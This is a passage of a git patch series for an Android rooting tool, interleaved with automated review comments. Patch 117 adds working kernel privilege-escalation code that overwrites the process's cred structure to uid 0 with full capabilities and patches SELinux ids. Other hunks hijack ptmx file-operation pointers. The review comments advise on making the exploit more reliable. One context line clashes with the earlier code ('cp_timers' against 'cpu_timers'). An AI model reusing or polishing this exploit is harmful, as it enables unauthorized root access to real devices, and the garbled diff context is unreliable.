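Review bot: `fd = open(PTMX_DEVICE, O_RDWR);` is still unchecked when the new `fsync(fd);` runs, so on an open failure the code calls fsync(-1) and then mmap on -1; both fail, the hook that attempt_exploit installed never fires, and the caller cannot distinguish that from a failed exploit. Add `if (fd < 0) { return false; }` right after the open. The rest of run_callback_with_fsync_and_mmap, including how `ret` is set, is outside the hunk.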
@@ -170,6 +197,12 @@ run_with_mmap(memory_callback_t callback)
 return false;
 }
+ setup_ptmx_fops_fsync_address();
+ if (!ptmx_fops_fsync_address) {
+ printf("You need to manage to get ptmx_fops address.\n");
+ return false;
+ }
+
 setup_ptmx_fops_mmap_address();
 if (!ptmx_fops_mmap_address) {
 printf("You need to manage to get ptmx_fops address.\n");
@@ -185,9 +218,9 @@ run_with_mmap(memory_callback_t callback)
 return false;
 }
- return attempt_exploit(ptmx_fops_mmap_address,
- (unsigned long int)&ptmx_mmap, 0,
- run_callback_with_mmap, callback);
+ return attempt_exploit(ptmx_fops_fsync_address,
+ (unsigned long int)&setup_mmap_by_fsync, 0,
+ run_callback_with_fsync_and_mmap, callback);
 }
 static bool
From fb2f548f04a195776480d08726b094b947d26665 Mon Sep 17 00:00:00 2001
From: fi01
Date: Mon, 23 Dec 2013 02:55:25 +0900
Subject: [PATCH 102/125] update subprojects
---
 device_database | 2 +-
 libmsm_acdb_exploit | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/device_database b/device_database
index 7ce318e..b0d1a6c 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit 7ce318ef25308b46b8279c94561e38b5fe06d239
+Subproject commit b0d1a6ca1a2d8459bc8ddd6625af8525a66a705a
diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit
index 4ea9f84..fad9d66 160000
--- a/libmsm_acdb_exploit
+++ b/libmsm_acdb_exploit
@@ -1 +1 @@
-Subproject commit 4ea9f847e2ffd8077d493c45e6a4973b4929688f
+Subproject commit fad9d66d9793b4c44049a00fcb85be0ad05b6035
From 8ca2228c1e9acf78b38d684a0fbb5b709608ef95 Mon Sep 17 00:00:00 2001
From: fi01
Date: Wed, 25 Dec 2013 08:35:06 +0900
Subject: [PATCH 103/125] update subprojects
---
 libexploit | 2 +-
 libkallsyms | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/libexploit b/libexploit
index 76252ed..668780f 160000
--- a/libexploit
+++ b/libexploit
@@ -1 +1 @@
-Subproject commit 76252ed65f67a87402628d2d12f38f30550d2287
+Subproject commit 668780f94d953d1fab30dec8d98722017becdf8d
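Review bot: The failure message added for the `ptmx_fops_fsync_address` lookup is byte-for-byte the same text the existing block just below prints for `ptmx_fops_mmap_address`, so a log line cannot show which of the two lookups failed. Name the field in the new message, e.g. `printf("You need to manage to get ptmx_fops_fsync address.\n");`, and give the mmap message its own name if that block is touched later. The body of run_with_mmap starts outside the hunk.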
diff --git a/libkallsyms b/libkallsyms
index 49f2ec7..4e8d619 160000
--- a/libkallsyms
+++ b/libkallsyms
@@ -1 +1 @@
-Subproject commit 49f2ec7bce717e1b64f5d22270cbdb452236648e
+Subproject commit 4e8d619dd4be4fecf5eb6ea36d6d2fd14e6c32a0
From feb457c0e38d16f408d784fe868181433ff6e24d Mon Sep 17 00:00:00 2001
From: fi01
Date: Wed, 25 Dec 2013 13:03:14 +0900
Subject: [PATCH 104/125] update subprojects
---
 device_database | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/device_database b/device_database
index b0d1a6c..57ab9a7 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit b0d1a6ca1a2d8459bc8ddd6625af8525a66a705a
+Subproject commit 57ab9a7bfd9df4dd0774b98ceb4041435a8a0da3
From e346a4398d9622ce0ab76201e55b62d2203ee0ac Mon Sep 17 00:00:00 2001
From: fi01
Date: Fri, 17 Jan 2014 18:23:53 +0900
Subject: [PATCH 105/125] update subprojects
---
 device_database | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/device_database b/device_database
index 57ab9a7..0710f26 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit 57ab9a7bfd9df4dd0774b98ceb4041435a8a0da3
+Subproject commit 0710f266b7969a70d70a534a199205babbe90493
From 39fb283070b6543d39f8b2f38763c2bbe4a847ef Mon Sep 17 00:00:00 2001
From: Hiroyuki Ikezoe
Date: Fri, 2 May 2014 19:27:20 +0900
Subject: [PATCH 106/125] libsqlite has been moved into device_database.
---
 .gitmodules | 3 ---
 device_database | 2 +-
 libsqlite | 1 -
 3 files changed, 1 insertion(+), 5 deletions(-)
 delete mode 160000 libsqlite
diff --git a/.gitmodules b/.gitmodules
index c257cea..f457376 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -31,6 +31,3 @@
 [submodule "libget_user_exploit"]
 path = libget_user_exploit
 url = https://github.com/fi01/libget_user_exploit.git
-[submodule "libsqlite"]
- path = libsqlite
- url = https://github.com/android-rooting-tools/android_libsqlite.git
diff --git a/device_database b/device_database
index 0710f26..21abb64 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit 0710f266b7969a70d70a534a199205babbe90493
+Subproject commit 21abb64b14deb0cbf1279e319539dc8217c77952
diff --git a/libsqlite b/libsqlite
deleted file mode 160000
index 49e176c..0000000
--- a/libsqlite
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 49e176c19a639bbc47afc17b9ebb641c23049d64
From f31810f8075771f56da4a08948343f01af6890fe Mon Sep 17 00:00:00 2001
From: Hiroyuki Ikezoe
Date: Fri, 2 May 2014 20:11:57 +0900
Subject: [PATCH 107/125] All exploit libraries has been moved into libexploit/.
---
 .gitmodules | 24 ------------------------
 Android.mk | 8 --------
 libdiagexploit | 1 -
 libexploit | 2 +-
 libfb_mem_exploit | 1 -
 libfj_hdcp_exploit | 1 -
 libget_user_exploit | 1 -
 libmsm_acdb_exploit | 1 -
 libmsm_cameraconfig_exploit | 1 -
 libperf_event_exploit | 1 -
 libput_user_exploit | 1 -
 11 files changed, 1 insertion(+), 41 deletions(-)
 delete mode 160000 libdiagexploit
 delete mode 160000 libfb_mem_exploit
 delete mode 160000 libfj_hdcp_exploit
 delete mode 160000 libget_user_exploit
 delete mode 160000 libmsm_acdb_exploit
 delete mode 160000 libmsm_cameraconfig_exploit
 delete mode 160000 libperf_event_exploit
 delete mode 160000 libput_user_exploit
diff --git a/.gitmodules b/.gitmodules
index f457376..d56e434 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -1,33 +1,9 @@
-[submodule "libdiagexploit"]
- path = libdiagexploit
- url = git://github.com/android-rooting-tools/libdiagexploit.git
 [submodule "device_database"]
 path = device_database
 url = git://github.com/android-rooting-tools/android_device_database.git
-[submodule "libperf_event_exploit"]
- path = libperf_event_exploit
- url = git://github.com/android-rooting-tools/libperf_event_exploit.git
-[submodule "libmsm_acdb_exploit"]
- path = libmsm_acdb_exploit
- url = git://github.com/fi01/libmsm_acdb_exploit.git
-[submodule "libfj_hdcp_exploit"]
- path = libfj_hdcp_exploit
- url = git://github.com/fi01/libfj_hdcp_exploit.git
 [submodule "libkallsyms"]
 path = libkallsyms
 url = https://github.com/android-rooting-tools/libkallsyms.git
-[submodule "libfb_mem_exploit"]
- path = libfb_mem_exploit
- url = https://github.com/android-rooting-tools/libfb_mem_exploit.git
 [submodule "libexploit"]
 path = libexploit
 url = https://github.com/android-rooting-tools/libexploit.git
-[submodule "libmsm_cameraconfig_exploit"]
- path = libmsm_cameraconfig_exploit
- url = git://github.com/fi01/libmsm_cameraconfig_exploit.git
-[submodule "libput_user_exploit"]
- path = libput_user_exploit
- url = https://github.com/fi01/libput_user_exploit.git
-[submodule "libget_user_exploit"]
- path = libget_user_exploit
- url = https://github.com/fi01/libget_user_exploit.git
diff --git a/Android.mk b/Android.mk
index cbfdb80..9a4970f 100644
--- a/Android.mk
+++ b/Android.mk
@@ -13,14 +13,6 @@ LOCAL_MODULE := run_root_shell
 LOCAL_MODULE_TAGS := optional
 LOCAL_STATIC_LIBRARIES := libdevice_database
 LOCAL_STATIC_LIBRARIES += libexploit
-LOCAL_STATIC_LIBRARIES += libdiagexploit
-LOCAL_STATIC_LIBRARIES += libperf_event_exploit
-LOCAL_STATIC_LIBRARIES += libmsm_acdb_exploit
-LOCAL_STATIC_LIBRARIES += libfj_hdcp_exploit
-LOCAL_STATIC_LIBRARIES += libfb_mem_exploit
-LOCAL_STATIC_LIBRARIES += libmsm_cameraconfig_exploit
-LOCAL_STATIC_LIBRARIES += libput_user_exploit
-LOCAL_STATIC_LIBRARIES += libget_user_exploit
 LOCAL_STATIC_LIBRARIES += libkallsyms
 LOCAL_STATIC_LIBRARIES += libcutils libc
 LOCAL_LDFLAGS += -static
diff --git a/libdiagexploit b/libdiagexploit
deleted file mode 160000
index 4dd7f1b..0000000
--- a/libdiagexploit
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 4dd7f1b0dadb3ae5d8a914e1e22979c7bed3b6c3
diff --git a/libexploit b/libexploit
index 668780f..82e235c 160000
--- a/libexploit
+++ b/libexploit
@@ -1 +1 @@
-Subproject commit 668780f94d953d1fab30dec8d98722017becdf8d
+Subproject commit 82e235cf6d3d3d37132e10ac1767041943239bfa
diff --git a/libfb_mem_exploit b/libfb_mem_exploit
deleted file mode 160000
index de67230..0000000
--- a/libfb_mem_exploit
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit de67230ff25909fb38417490fee745925898009a
diff --git a/libfj_hdcp_exploit b/libfj_hdcp_exploit
deleted file mode 160000
index d1915b8..0000000
--- a/libfj_hdcp_exploit
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit d1915b8cb18c917340a83c6807c5a5fe1053902a
diff --git a/libget_user_exploit b/libget_user_exploit
deleted file mode 160000
index bedea14..0000000
--- a/libget_user_exploit
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit bedea14b5148931bf8bc98f8dfbac55f707a73ea
diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit
deleted file mode 160000
index fad9d66..0000000
--- a/libmsm_acdb_exploit
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit fad9d66d9793b4c44049a00fcb85be0ad05b6035
diff --git a/libmsm_cameraconfig_exploit b/libmsm_cameraconfig_exploit
deleted file mode 160000
index 5dd3072..0000000
--- a/libmsm_cameraconfig_exploit
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 5dd3072fe63c8612aa2a63d48f40a450acb9c810
diff --git a/libperf_event_exploit b/libperf_event_exploit
deleted file mode 160000
index db58c5d..0000000
--- a/libperf_event_exploit
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit db58c5d5767f007e3420c2232652506de787f6f0
diff --git a/libput_user_exploit b/libput_user_exploit
deleted file mode 160000
index d437838..0000000
--- a/libput_user_exploit
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit d43783871e38a3d26fa8c4ecd50c9453f8fa5a78
From 99ad56d4eb1e87d7f47c093d2433b1933177ded5 Mon Sep 17 00:00:00 2001
From: Hiroyuki Ikezoe
Date: Fri, 2 May 2014 20:12:44 +0900
Subject: [PATCH 108/125] Update device_database.
---
 device_database | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/device_database b/device_database
index 21abb64..199a3c3 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit 21abb64b14deb0cbf1279e319539dc8217c77952
+Subproject commit 199a3c3ab95ee1e150f51894f2647e91d4b0f42d
From babe70a1e7cd25f619936bde789d5ef4dccbdeb9 Mon Sep 17 00:00:00 2001
From: Hiroyuki Ikezoe
Date: Sat, 3 May 2014 08:45:27 +0900
Subject: [PATCH 109/125] Update device_database repository.
---
 device_database | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/device_database b/device_database
index 199a3c3..cfb7cc2 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit 199a3c3ab95ee1e150f51894f2647e91d4b0f42d
+Subproject commit cfb7cc26e8e53db838e07f9e469b77753fe1cd55
From d716a58f3227e03820f0b6ff8e0178ee53312bb4 Mon Sep 17 00:00:00 2001
From: Hiroyuki Ikezoe
Date: Sat, 3 May 2014 12:45:31 +0900
Subject: [PATCH 110/125] Update device_database submodule.
---
 device_database | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/device_database b/device_database
index cfb7cc2..9384566 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit cfb7cc26e8e53db838e07f9e469b77753fe1cd55
+Subproject commit 93845664231ae39825c0058a5d02088791ecc512
From 79bc66081085b48f028305dc858314026e330fa9 Mon Sep 17 00:00:00 2001
From: Hiroyuki Ikezoe
Date: Sun, 4 May 2014 06:47:39 +0900
Subject: [PATCH 111/125] Expand tab.
---
 mm.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/mm.c b/mm.c
index 44419f6..ab913fd 100644
--- a/mm.c
+++ b/mm.c
@@ -220,7 +220,7 @@ run_with_mmap(memory_callback_t callback)
 return attempt_exploit(ptmx_fops_fsync_address,
 (unsigned long int)&setup_mmap_by_fsync, 0,
- run_callback_with_fsync_and_mmap, callback);
+ run_callback_with_fsync_and_mmap, callback);
 }
 static bool
From a62259fda3d46b5e7a637c6f5711ab5574b3d6ff Mon Sep 17 00:00:00 2001
From: Hiroyuki Ikezoe
Date: Sun, 1 Jun 2014 20:17:43 +0900
Subject: [PATCH 112/125] Update submodules. Use perf_swevent_enabled and delayed_rsp_id in device_database.
---
 device_database | 2 +-
 libexploit | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/device_database b/device_database
index 9384566..5a65675 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit 93845664231ae39825c0058a5d02088791ecc512
+Subproject commit 5a6567523c2e42c9d2c66fc9bc4661096c0af9a1
diff --git a/libexploit b/libexploit
index 82e235c..558f198 160000
--- a/libexploit
+++ b/libexploit
@@ -1 +1 @@
-Subproject commit 82e235cf6d3d3d37132e10ac1767041943239bfa
+Subproject commit 558f1983336fc5b1b91d9f8174a0739afbd386df
From 6ba8012cc154559f16f458e7a92172078b0b2341 Mon Sep 17 00:00:00 2001
From: fi01
Date: Fri, 6 Jun 2014 20:43:13 +0900
Subject: [PATCH 113/125] Update subprojects
---
 device_database | 2 +-
 libexploit | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/device_database b/device_database
index 5a65675..78d13b5 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit 5a6567523c2e42c9d2c66fc9bc4661096c0af9a1
+Subproject commit 78d13b55bec03205d855431382a0c5ef6047b076
diff --git a/libexploit b/libexploit
index 558f198..49faf0d 160000
--- a/libexploit
+++ b/libexploit
@@ -1 +1 @@
-Subproject commit 558f1983336fc5b1b91d9f8174a0739afbd386df
+Subproject commit 49faf0d15bcec8cf382d0abe32c99988db3eb606
From 0f5506d636d324426ae1a45b51ff0a80511d62d1 Mon Sep 17 00:00:00 2001
From: fi01
Date: Sat, 13 Sep 2014 20:56:37 +0900
Subject: [PATCH 114/125] Update subprojects
---
 device_database | 2 +-
 libexploit | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/device_database b/device_database
index 78d13b5..0bb5742 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit 78d13b55bec03205d855431382a0c5ef6047b076
+Subproject commit 0bb5742fdf142e867e5d363a2b20954d2d7777a1
diff --git a/libexploit b/libexploit
index 49faf0d..970524b 160000
--- a/libexploit
+++ b/libexploit
@@ -1 +1 @@
-Subproject commit 49faf0d15bcec8cf382d0abe32c99988db3eb606
+Subproject commit 970524b7f6e11486d0221c821ba02ded43a105da
From ab89ba4f9780de15753bcc5436c67731f2ab2d38 Mon Sep 17 00:00:00 2001
From: fi01
Date: Wed, 17 Sep 2014 04:59:38 +0900
Subject: [PATCH 115/125] Update submodule
---
 libexploit | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/libexploit b/libexploit
index 970524b..adec2af 160000
--- a/libexploit
+++ b/libexploit
@@ -1 +1 @@
-Subproject commit 970524b7f6e11486d0221c821ba02ded43a105da
+Subproject commit adec2af37ea2476df50e7805d79efa150fe73969
From 399199d54de64ac757ee1ea73a033fc4c992f7b4 Mon Sep 17 00:00:00 2001
From: fi01
Date: Wed, 17 Sep 2014 18:48:33 +0900
Subject: [PATCH 116/125] Update submodule
---
 libkallsyms | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/libkallsyms b/libkallsyms
index 4e8d619..6285f59 160000
--- a/libkallsyms
+++ b/libkallsyms
@@ -1 +1 @@
-Subproject commit 4e8d619dd4be4fecf5eb6ea36d6d2fd14e6c32a0
+Subproject commit 6285f5965df636d9787f3dc90e9352e9a4b3b020
From 17d68521b7c98782b219803bd215fe4a8f6f8d09 Mon Sep 17 00:00:00 2001
From: fi01
Date: Thu, 18 Sep 2014 00:15:02 +0900
Subject: [PATCH 117/125] Try to modify in struct cred directly when commit_creds() is failed.
---
 main.c | 174 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++-
 1 file changed, 173 insertions(+), 1 deletion(-)
diff --git a/main.c b/main.c
index 60f5cc0..0375271 100644
--- a/main.c
+++ b/main.c
@@ -18,10 +18,171 @@
 #include "libexploit/exploit.h"
 #include "libkallsyms/kallsyms_in_memory.h"
+#define THREAD_SIZE 8192
+
+#define KERNEL_START 0xc0000000
+
+struct thread_info;
+struct task_struct;
+struct cred;
+struct kernel_cap_struct;
+struct task_security_struct;
+struct list_head;
+
+struct thread_info {
+ unsigned long flags;
+ int preempt_count;
+ unsigned long addr_limit;
+ struct task_struct *task;
+
+ /* ... */
+};
+
+struct kernel_cap_struct {
+ unsigned long cap[2];
+};
+
+struct cred {
+ unsigned long usage;
+ uid_t uid;
+ gid_t gid;
+ uid_t suid;
+ gid_t sgid;
+ uid_t euid;
+ gid_t egid;
+ uid_t fsuid;
+ gid_t fsgid;
+ unsigned long securebits;
+ struct kernel_cap_struct cap_inheritable;
+ struct kernel_cap_struct cap_permitted;
+ struct kernel_cap_struct cap_effective;
+ struct kernel_cap_struct cap_bset;
+ unsigned char jit_keyring;
+ void *thread_keyring;
+ void *request_key_auth;
+ void *tgcred;
+ struct task_security_struct *security;
+
+ /* ... */
+};
+
+struct list_head {
+ struct list_head *next;
+ struct list_head *prev;
+};
+
+struct task_security_struct {
+ unsigned long osid;
+ unsigned long sid;
+ unsigned long exec_sid;
+ unsigned long create_sid;
+ unsigned long keycreate_sid;
+ unsigned long sockcreate_sid;
+};
+
+
+struct task_struct_partial {
+ struct list_head cpu_timers[3];
+ struct cred *real_cred;
+ struct cred *cred;
+ struct cred *replacement_session_keyring;
+ char comm[16];
+};
+
+static inline struct thread_info *
+current_thread_info(void)
+{
+ register unsigned long sp asm ("sp");
+ return (struct thread_info *)(sp & ~(THREAD_SIZE - 1));
+}
+
+static bool
+is_cpu_timer_valid(struct list_head *cpu_timer)
+{
+ if (cpu_timer->next != cpu_timer->prev) {
+ return false;
+ }
+
+ if ((unsigned long int)cpu_timer->next < KERNEL_START) {
+ return false;
+ }
+
+ return true;
+}
+
+static void
+obtain_root_privilege_by_modify_task_cred(void)
+{
+ struct thread_info *info;
+ struct cred *cred;
+ struct task_security_struct
*security;
+ int i;
+
+ info = current_thread_info();
+ cred = NULL;
+
+ for (i = 0; i < 0x400; i+= 4) {
+ struct task_struct_partial *task = ((void *)info->task) + i;
+
+ if (is_cpu_timer_valid(&task->cpu_timers[0])
+ && is_cpu_timer_valid(&task->cpu_timers[1])
+ && is_cpu_timer_valid(&task->cpu_timers[2])
+ && task->real_cred == task->cred) {
+ cred = task->cred;
+ break;
+ }
+ }
+
+ if (cred == NULL) {
+ return;
+ }
+
+ cred->uid = 0;
+ cred->gid = 0;
+ cred->suid = 0;
+ cred->sgid = 0;
+ cred->euid = 0;
+ cred->egid = 0;
+ cred->fsuid = 0;
+ cred->fsgid = 0;
+
+ cred->cap_inheritable.cap[0] = 0xffffffff;
+ cred->cap_inheritable.cap[1] = 0xffffffff;
+ cred->cap_permitted.cap[0] = 0xffffffff;
+ cred->cap_permitted.cap[1] = 0xffffffff;
+ cred->cap_effective.cap[0] = 0xffffffff;
+ cred->cap_effective.cap[1] = 0xffffffff;
+ cred->cap_bset.cap[0] = 0xffffffff;
+ cred->cap_bset.cap[1] = 0xffffffff;
+
+ security = cred->security;
+ if (security) {
+ if (security->osid != 0
+ && security->sid != 0
+ && security->exec_sid == 0
+ && security->create_sid == 0
+ && security->keycreate_sid == 0
+ && security->sockcreate_sid == 0) {
+ security->osid = 1;
+ security->sid = 1;
+ }
+ }
+}
+
+static void
+obtain_root_privilege_by_commit_creds(void)
+{
+ commit_creds(prepare_kernel_cred(0));
+}
+
+static void (*obtain_root_privilege_func)(void);
+
 void
 obtain_root_privilege(void)
 {
- commit_creds(prepare_kernel_cred(0));
+ if (obtain_root_privilege_func) {
+ obtain_root_privilege_func();
+ }
 }
 static bool
@@ -30,8 +191,19 @@ run_obtain_root_privilege(void *user_data)
 int fd;
 int ret;
+ obtain_root_privilege_func = obtain_root_privilege_by_commit_creds;
+
 fd = open(PTMX_DEVICE, O_WRONLY);
+
 ret = fsync(fd);
+
+ if (getuid() != 0) {
+ printf("commit_creds(): failed. Try to hack task->cred.\n");
+
+ obtain_root_privilege_func = obtain_root_privilege_by_modify_task_cred;
+ ret = fsync(fd);
+ }
+
 close(fd);
 return (ret == 0);
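Review bot: The struct layouts introduced in this hunk (`struct thread_info`, `struct cred`, `struct task_security_struct`, `struct task_struct_partial`) and the constants `THREAD_SIZE 8192` and `KERNEL_START 0xc0000000` are hand-copied kernel definitions with no comment recording which kernel version and configuration they were taken from, and nothing in the hunk validates them, so on a kernel with a different layout the writes in obtain_root_privilege_by_modify_task_cred can silently land on the wrong fields. Add a comment above the struct block, e.g. `/* Hand-copied 32-bit ARM kernel layouts; the field order of struct cred and struct thread_info and the THREAD_SIZE value vary by kernel version and config. */`. As a style point, `((void *)info->task) + i` relies on the GCC extension of arithmetic on `void *`; `(char *)info->task + i` is the standard form, and `i+= 4` should read `i += 4`. The hunk starts at the top-level include block, so no enclosing function is cut.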
From c94bb4a7016c66e6503d6e1f5f1f6cf0cc801142 Mon Sep 17 00:00:00 2001
From: fi01
Date: Fri, 19 Sep 2014 02:19:19 +0900
Subject: [PATCH 118/125] Update submodule
---
 device_database | 2 +-
 libkallsyms | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/device_database b/device_database
index 0bb5742..57dc3e3 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit 0bb5742fdf142e867e5d363a2b20954d2d7777a1
+Subproject commit 57dc3e377e28663837c85d8ca9e1b1d1f9b0f8c9
diff --git a/libkallsyms b/libkallsyms
index 6285f59..02d8e7e 160000
--- a/libkallsyms
+++ b/libkallsyms
@@ -1 +1 @@
-Subproject commit 6285f5965df636d9787f3dc90e9352e9a4b3b020
+Subproject commit 02d8e7e85bb88987b09a56ece6487ae890a51860
From 14d1bbefbca5e75ce020b1a60f1e4ff4a6962845 Mon Sep 17 00:00:00 2001
From: fi01
Date: Tue, 21 Oct 2014 20:05:26 +0900
Subject: [PATCH 119/125] Update device_database submodule.
---
 device_database | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/device_database b/device_database
index 57dc3e3..1fb787b 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit 57dc3e377e28663837c85d8ca9e1b1d1f9b0f8c9
+Subproject commit 1fb787ba27950bdac50c67fa7371c2e53cd0de03
From 61ea53b308457fb73f5875518cc992694ededd3e Mon Sep 17 00:00:00 2001
From: fi01
Date: Mon, 5 Oct 2015 22:41:27 +0900
Subject: [PATCH 120/125] Improve cred address detection
---
 main.c | 3 +++
 1 file changed, 3 insertions(+)
diff --git a/main.c b/main.c
index 0375271..7ea6ff7 100644
--- a/main.c
+++ b/main.c
@@ -116,9 +116,11 @@ obtain_root_privilege_by_modify_task_cred(void)
 struct thread_info *info;
 struct cred *cred;
 struct task_security_struct *security;
+ unsigned long addr_limit;
 int i;
 info = current_thread_info();
+ addr_limit = info->addr_limit;
 cred = NULL;
 for (i = 0; i < 0x400; i+= 4) {
@@ -127,6 +129,7 @@ obtain_root_privilege_by_modify_task_cred(void)
 if (is_cpu_timer_valid(&task->cpu_timers[0])
 && is_cpu_timer_valid(&task->cpu_timers[1])
 && is_cpu_timer_valid(&task->cp_timers[2])
+ && (unsigned long)task->cred >= addr_limit
 && task->real_cred == task->cred) {
 cred = task->cred;
 break;
From f06f9fc9692c3de3a64a527ff3ae34b683490393 Mon Sep 17 00:00:00 2001
From: fi01
Date: Mon, 5 Oct 2015 22:41:45 +0900
Subject: [PATCH 121/125] Update submodule
---
 device_database | 2 +-
 libexploit | 2 +-
 libkallsyms | 2 +-
 3 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/device_database b/device_database
index 1fb787b..0ddc260 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit 1fb787ba27950bdac50c67fa7371c2e53cd0de03
+Subproject commit 0ddc2604131fbd93d48524d3dab95eb050ed608f
diff --git a/libexploit b/libexploit
index adec2af..5faee5e 160000
--- a/libexploit
+++ b/libexploit
@@ -1 +1 @@
-Subproject commit adec2af37ea2476df50e7805d79efa150fe73969
+Subproject commit 5faee5ece8afd04dcfea93ddd6800431851db9f9
diff --git a/libkallsyms b/libkallsyms
index 02d8e7e..ff8ded7 160000
--- a/libkallsyms
+++ b/libkallsyms
@@ -1 +1 @@
-Subproject commit 02d8e7e85bb88987b09a56ece6487ae890a51860
+Subproject commit ff8ded79aa48d9bb8acc76a5599313aa3a4b0f9d
From 5e7aa1add0749228c4c9454b8c3cc0a4855e9503 Mon Sep 17 00:00:00 2001
From: fi01
Date: Wed, 7 Oct 2015 23:26:00 +0900
Subject: [PATCH 122/125] Update submodule
---
 libexploit | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/libexploit b/libexploit
index 5faee5e..e62df1f 160000
--- a/libexploit
+++ b/libexploit
@@ -1 +1 @@
-Subproject commit 5faee5ece8afd04dcfea93ddd6800431851db9f9
+Subproject commit e62df1fc5d68dfe4bd71807cc9b527e5e7ee9c64
From 40f9028303e48e16ba8853f62d5c0cf700d72a19 Mon Sep 17 00:00:00 2001
From: fi01
Date: Sun, 22 Nov 2015 14:46:57 +0900
Subject: [PATCH 123/125] Update submodule
---
 libexploit | 2 +-
 libkallsyms | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/libexploit b/libexploit
index e62df1f..e919a58 160000
--- a/libexploit
+++ b/libexploit
@@ -1 +1 @@
-Subproject commit e62df1fc5d68dfe4bd71807cc9b527e5e7ee9c64
+Subproject commit e919a586bb8ea486839364b1ba933ac21173c674
diff --git a/libkallsyms b/libkallsyms
index ff8ded7..aa38ae7 160000
--- a/libkallsyms
+++ b/libkallsyms
@@ -1 +1 @@
-Subproject commit ff8ded79aa48d9bb8acc76a5599313aa3a4b0f9d
+Subproject commit aa38ae78145724a2a330c1bab620cf3df7c3f6ad
From c6ff7701357c3aa1047cfd3c69f67249014181f7 Mon Sep 17 00:00:00 2001
From: Richard Sartor
Date: Thu, 10 Mar 2016 12:36:33 -0600
Subject: [PATCH 124/125] Use a publicly accessible url for the submodule. Outside contributors without `git://` access to the android_device_database repo get a fatal error when trying to clone the repo. Changing the access method to `https://` makes it possible for these user to clone the repo and all its submodules.
---
 .gitmodules | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.gitmodules b/.gitmodules
index d56e434..0a93234 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -1,6 +1,6 @@
 [submodule "device_database"]
 path = device_database
- url = git://github.com/android-rooting-tools/android_device_database.git
+ url = https://github.com/android-rooting-tools/android_device_database.git
 [submodule "libkallsyms"]
 path = libkallsyms
 url = https://github.com/android-rooting-tools/libkallsyms.git
From 652baca8586996630343a074aca24cbd653282a9 Mon Sep 17 00:00:00 2001
From: Eunchan
Date: Tue, 8 Nov 2016 11:07:20 +0900
Subject: [PATCH 125/125] Fixed two typos
---
 main.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/main.c b/main.c
index 7ea6ff7..cce59ff 100644
--- a/main.c
+++ b/main.c
@@ -264,11 +264,11 @@ bool find_variables_in_memory(void *mem, size_t length)
 {
 kallsyms *info;
- printf("Search address in memroy...\n");
+ printf("Search address in memory...\n");
 info = kallsyms_in_memory_init(mem, length);
 if (info) {
- printf("Using kallsyms_in_memroy...\n");
+ printf("Using kallsyms_in_memory...\n");
 if (!prepare_kernel_cred) {
 prepare_kernel_cred = (prepare_kernel_cred_t)kallsyms_in_memory_lookup_name(info, "prepare_kernel_cred");